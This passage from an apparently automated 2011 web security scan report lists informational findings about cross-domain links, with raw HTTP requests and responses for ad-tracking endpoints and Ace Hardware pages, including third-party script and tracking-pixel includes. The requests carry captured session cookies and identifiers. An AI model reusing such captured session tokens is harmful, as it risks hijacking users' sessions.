Set-Cookie: JSESSIONID=D7703DA7167065B9BA379AFA85CD817C; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:12:20 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 839

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979619146%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758518%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D"></iframe>
...[SNIP]...

17.21. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1 HTTP/1.1
Host: track.searchignite.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 01:54:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1&u=
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&amp;jscript=1&amp;u=">here</a>.</h2>
</body>
...[SNIP]...

17.22. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1 HTTP/1.1
Host: track.searchignite.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&amp;jscript=1&amp;u=">here</a>.</h2>
</body>
...[SNIP]...

17.23. http://www.acehardware.com/category/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:27 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" />


   <link rel="shortcut icon" href="http://ACE.imageg.net/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/WIZ_ACE_topNav.css" />
   
   
       <meta property="fb:page_id" content="4949752878"/>
...[SNIP]...
<!--SEO Changes for PMO# 437313 End-->

   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/DF_ACE_main.css" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_category.css" />
   
   
</head>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
</style>

<img class="dB mB10" src="http://ACE.imageg.net/images/ace_lng.jpg" width="205" height="53" alt="Lawn & Garden" border="0" />

<div id="deptLeftNav" class="w203 mB10 topcatBorder topcatBgColor">
   
   <img class="dB pR t1- l1-" src="http://ACE.imageg.net/images/ace_topcat_lawnandgarden_tl.gif" width="12" height="12" alt="" border="0" />
   

   <div class="w186 topcatBorderBtm fB mB10 mL14 pL2 pB10 pR l1">
...[SNIP]...
</div>


   <img class="dB fR pR t3 l1" src="http://ACE.imageg.net/images/ace_topcat_lawnandgarden_br.gif" width="12" height="12" alt="" border="0" />
   

   <br clear="all" />
...[SNIP]...
</div>


                   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_box.js"></script>
<link href="http://ACE.imageg.net/css/WIZ_ACE_box.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_ToolTip.js"></script>
<link href="http://ACE.imageg.net/css/WIZ_ACE_ToolTip.css" rel="stylesheet" type="text/css" />


                       <img class="dB" src="http://ACE.imageg.net/images/leftnav_projectssolutions_hdr.gif" width="205" height="31" alt="" border="0" />
   <div class="w193 b1_c5 bCl2 pL10">
...[SNIP]...
<a href="/infohome/index.jsp"><img src="http://ACE.imageg.net/images/viewall_projectsSolutions.gif" width="175" height="11" alt="View All Projects &amp; Solutions" border="0" /></a>
...[SNIP]...
</div>
       <img class="dB pR t1 l11-" src="http://ACE.imageg.net/images/bucket_bl_projectsandsolutions.gif" width="12" height="10" alt="" border="0" />
   </div>
...[SNIP]...
<div id="ace_category_1" style="width:205px;border:0px;overflow:hidden;">
<img border="0" name="White Spacer_3" src="http://ACE.imageg.net/cms_widgets/11/57/115755_assets/whitespacer.gif" height="1" width="1" /></div>
...[SNIP]...
</a><img border="0" name="cms_image55585468" src="http://ACE.imageg.net/cms_widgets/47/44/474483_assets/static_dept_113919.jpg" height="261" width="563" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL1');" /></div>
...[SNIP]...
<div id="ace_category_3" style="width:563px;border:0px;overflow:hidden;">


<img border="0" name="LawnGardenBrandBard_032511" src="http://ACE.imageg.net/cms_widgets/44/10/441084_assets/brandbar_lg.png" height="53" width="572" align="Default" valign="Default" usemap="#lg_map" /><map name="lg_map">
...[SNIP]...
</script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_dept.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
<a href="javascript:void(0);" onclick="omni_TabClick('Lawn & Garden:Featured Products');turnOnTab(0);" onmouseover="imgOn('tab0');" onmouseout="imgOff('tab0');" class="cP"><img id="tab0" class="fL dB pR t1 cP" src="http://ACE.imageg.net/images/lawnandgarden_featprods_on.gif" width="132" height="23" alt="Featured Products" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Lawn & Garden:Top Sellers');turnOnTab(1);" onmouseover="imgOn('tab1');" onmouseout="imgOff('tab1');"><img id="tab1" class="fL dB" src="http://ACE.imageg.net/images/tabset_topsellers_off.gif" width="95" height="23" alt="Top Sellers" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Lawn & Garden:Top Rated');turnOnTab(2);" onmouseover="imgOn('tab2');" onmouseout="imgOff('tab2');"><img id="tab2" class="fL dB" src="http://ACE.imageg.net/images/tabset_toprated_off.gif" width="83" height="23" alt="Top Rated" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Lawn & Garden:Whats New');turnOnTab(3);" onmouseover="imgOn('tab3');" onmouseout="imgOff('tab3');"><img id="tab3" class="fL dB" src="http://ACE.imageg.net/images/tabset_whatsnew_off.gif" width="93" height="23" alt="What's New" border="0" /></a>
...[SNIP]...
kFrom=Lawn+%26+Garden%3AFeatured+Products';return false;" onclick="omni_TabClick('Lawn & Garden:Featured Products:Scotts. 3.75lb Northern Blend Turf Builder Ez Seed Sun & Shade Grass Seed (17401)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8013737th.jpg" alt="Scotts. 3.75lb Northern Blend Turf Builder Ez Seed Sun & Shade Grass Seed (17401) - Ace Hardware" title="Scotts. 3.75lb Northern Blend Turf Builder Ez Seed Sun & Shade Grass Seed (17401) - Ace Hardware"></a>
...[SNIP]...
ctId=3887813&cp=2568444&clickFrom=Lawn+%26+Garden%3AFeatured+Products';return false;" onclick="omni_TabClick('Lawn & Garden:Featured Products:Suncast. Tomato and Vegetable Planter Tower (PLT2500)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6877984th.jpg" alt="Suncast. Tomato and Vegetable Planter Tower (PLT2500) - Ace Hardware" title="Suncast. Tomato and Vegetable Planter Tower (PLT2500) - Ace Hardware"></a>
...[SNIP]...
Id=2371421&cp=2568444&clickFrom=Lawn+%26+Garden%3AFeatured+Products';return false;" onclick="omni_TabClick('Lawn & Garden:Featured Products:Scotts&reg; Deluxe Edgeguard Broadcast Spreader (76232)');" ><img src="http://ACE.imageg.net/graphics/product_images/p2991437th.gif" alt="Scotts&reg; Deluxe Edgeguard Broadcast Spreader (76232) - Ace Hardware" title="Scotts&reg; Deluxe Edgeguard Broadcast Spreader (76232) - Ace Hardware"></a>
...[SNIP]...
sp?productId=3532575&cp=2568444&clickFrom=Lawn+%26+Garden%3AFeatured+Products';return false;" onclick="omni_TabClick('Lawn & Garden:Featured Products:Suncast&reg; Vertical Storage Shed (GS4000BA)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5840715th.jpg" alt="Suncast&reg; Vertical Storage Shed (GS4000BA) - Ace Hardware" title="Suncast&reg; Vertical Storage Shed (GS4000BA) - Ace Hardware"></a>
...[SNIP]...
sp?productId=2989946&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Sellers';return false;" onclick="omni_TabClick('Lawn & Garden:Top Sellers:Ace&reg; 6 Ct. Ft. Two Wheel Contractor Steel Wheelbarrow');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-4403835th.jpg" alt="Ace&reg; 6 Ct. Ft. Two Wheel Contractor Steel Wheelbarrow - Ace Hardware" title="Ace&reg; 6 Ct. Ft. Two Wheel Contractor Steel Wheelbarrow - Ace Hardware"></a>
...[SNIP]...
='/product/index.jsp?productId=3962358&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Sellers';return false;" onclick="omni_TabClick('Lawn & Garden:Top Sellers:Mosquito Magnet&reg; Executive (MM3300)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-7079917th.jpg" alt="Mosquito Magnet&reg; Executive (MM3300) - Ace Hardware" title="Mosquito Magnet&reg; Executive (MM3300) - Ace Hardware"></a>
...[SNIP]...
duct/index.jsp?productId=3532575&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Sellers';return false;" onclick="omni_TabClick('Lawn & Garden:Top Sellers:Suncast&reg; Vertical Storage Shed (GS4000BA)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5840715th.jpg" alt="Suncast&reg; Vertical Storage Shed (GS4000BA) - Ace Hardware" title="Suncast&reg; Vertical Storage Shed (GS4000BA) - Ace Hardware"></a>
...[SNIP]...
ref='/product/index.jsp?productId=2325406&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Sellers';return false;" onclick="omni_TabClick('Lawn & Garden:Top Sellers:Mantis. Gas Roto-Tiller (7225-00-02)');" ><img src="http://ACE.imageg.net/graphics/product_images/p2893294th.gif" alt="Mantis. Gas Roto-Tiller (7225-00-02) - Ace Hardware" title="Mantis. Gas Roto-Tiller (7225-00-02) - Ace Hardware"></a>
...[SNIP]...
'/product/index.jsp?productId=11227922&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Rated';return false;" onclick="omni_TabClick('Lawn & Garden:Top Rated:Union&reg; 9in Half Mood Turf Edger (61102)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583938th.jpg" alt="Union&reg; 9in Half Mood Turf Edger (61102) - Ace Hardware" title="Union&reg; 9in Half Mood Turf Edger (61102) - Ace Hardware"></a>
...[SNIP]...
'/product/index.jsp?productId=11202222&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Rated';return false;" onclick="omni_TabClick('Lawn & Garden:Top Rated:Fiskars&reg; 23.5in Chopping Axe (78576935)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9515270th.jpg" alt="Fiskars&reg; 23.5in Chopping Axe (78576935) - Ace Hardware" title="Fiskars&reg; 23.5in Chopping Axe (78576935) - Ace Hardware"></a>
...[SNIP]...
index.jsp?productId=11202220&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Rated';return false;" onclick="omni_TabClick('Lawn & Garden:Top Rated:Fiskars&reg; 2.6Gal Easy Pour Watering Can (204787CP)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9515223th.jpg" alt="Fiskars&reg; 2.6Gal Easy Pour Watering Can (204787CP) - Ace Hardware" title="Fiskars&reg; 2.6Gal Easy Pour Watering Can (204787CP) - Ace Hardware"></a>
...[SNIP]...
ct/index.jsp?productId=11088603&cp=2568444&clickFrom=Lawn+%26+Garden%3ATop+Rated';return false;" onclick="omni_TabClick('Lawn & Garden:Top Rated:Rain Reserve&reg; Rain Barrel Spigot Kit (2012314)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9288696th.jpg" alt="Rain Reserve&reg; Rain Barrel Spigot Kit (2012314) - Ace Hardware" title="Rain Reserve&reg; Rain Barrel Spigot Kit (2012314) - Ace Hardware"></a>
...[SNIP]...
ctId=11592943&cp=2568444&clickFrom=Lawn+%26+Garden%3AWhats+New';return false;" onclick="omni_TabClick('Lawn & Garden:Whats New:Digz&reg; Small Leather Palm Garden Gloves with Safety Cuff - 6 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-10226465th.jpg" alt="Digz&reg; Small Leather Palm Garden Gloves with Safety Cuff - 6 Pack - Ace Hardware" title="Digz&reg; Small Leather Palm Garden Gloves with Safety Cuff - 6 Pack - Ace Hardware"></a>
...[SNIP]...
='/product/index.jsp?productId=11585613&cp=2568444&clickFrom=Lawn+%26+Garden%3AWhats+New';return false;" onclick="omni_TabClick('Lawn & Garden:Whats New:Ace. 50ft Heavy Duty Kink Free Garden Hose');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-4274617th.jpg" alt="Ace. 50ft Heavy Duty Kink Free Garden Hose - Ace Hardware" title="Ace. 50ft Heavy Duty Kink Free Garden Hose - Ace Hardware"></a>
...[SNIP]...
='/product/index.jsp?productId=11585612&cp=2568444&clickFrom=Lawn+%26+Garden%3AWhats+New';return false;" onclick="omni_TabClick('Lawn & Garden:Whats New:Ace. 25ft Heavy Duty Kink Free Garden Hose');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-4274617th.jpg" alt="Ace. 25ft Heavy Duty Kink Free Garden Hose - Ace Hardware" title="Ace. 25ft Heavy Duty Kink Free Garden Hose - Ace Hardware"></a>
...[SNIP]...
'/product/index.jsp?productId=11585611&cp=2568444&clickFrom=Lawn+%26+Garden%3AWhats+New';return false;" onclick="omni_TabClick('Lawn & Garden:Whats New:Ace. 100ft Heavy Duty Kink Free Garden Hose');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-4274617th.jpg" alt="Ace. 100ft Heavy Duty Kink Free Garden Hose - Ace Hardware" title="Ace. 100ft Heavy Duty Kink Free Garden Hose - Ace Hardware"></a>
...[SNIP]...
<!-- end tabs -->

   <img class="fR dB pR t1 l1" src="http://ACE.imageg.net/images/lawnandgarden_tabset_br.gif" width="12" height="13" alt="" border="0" />
   <div class="cB">
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">

<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=lawng319;u1=;u2=2;u3=;u4=2568444;u5=http://www.acehardware.com/home/index.jsp?rdir=1A;ord=1;num=39034306?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">
           

           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...
<!--You are running on ashprd2_ws_47_5-->


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...
<!-- end sitebg -->

   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />

   <!-- START SCANALERT CODE -->
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.24. http://www.acehardware.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /home/index.jsp?rdir=1A HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544630340%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/images/checkout/cart2_signin.gif%252526ot%25253DIMAGE%3B; fsr.a=1305542835024; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.1.10.1305542835

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:16 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>

<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/DF_ACE_main.css" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />
<style type="text/css">
...[SNIP]...
shops online, hardware store online, hardware stores online, hardware retailer, home improvement, home improvements, home improvement store, home improvement stores, home improvement retailers" />


   <link rel="shortcut icon" href="http://ACE.imageg.net/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/WIZ_ACE_topNav.css" />
   
   
       <meta property="fb:page_id" content="4949752878"/>
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />-->
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<noscript><img class="dN" src="http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?" width="1" height="1" alt="" border="0" /></noscript>
<!-- End of DoubleClick Spotlight Tag: Please do not remove-->
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
</a><img border="0" name="cms_image84006029" src="http://ACE.imageg.net/cms_widgets/47/32/473257_assets/static_114332.png" height="261" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" /></div>
...[SNIP]...
<div id="ace_home_2" style="width:572px;border:0px;overflow:hidden;">


<img border="0" name="HomepageBrandBar_032511" src="http://ACE.imageg.net/cms_widgets/44/10/441077_assets/homepagebb.jpg" height="53" width="572" align="Default" valign="Default" usemap="#HomepageBrandBarMap" /><map name="HomepageBrandBarMap">
...[SNIP]...
</div>

               
                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
<a href="javascript:void(0);" onclick="omni_TabClick('Home:Featured Products');turnOnTab(0);" onmouseover="imgOn('tab0');" onmouseout="imgOff('tab0');" class="cP"><img id="tab0" class="fL dB pR t1 cP" src="http://ACE.imageg.net/images/home_tabs_featprods_on.gif" width="132" height="23" alt="Featured Products" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Sellers');turnOnTab(1);" onmouseover="imgOn('tab1');" onmouseout="imgOff('tab1');"><img id="tab1" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_topsellers_off.gif" width="95" height="23" alt="Top Sellers" border="0" /></a>
   
   
   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Rated');turnOnTab(2);" onmouseover="imgOn('tab2');" onmouseout="imgOff('tab2');"><img id="tab2" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_toprated_off.gif" width="84" height="23" alt="Top Rated" border="0" /></a>
   
   
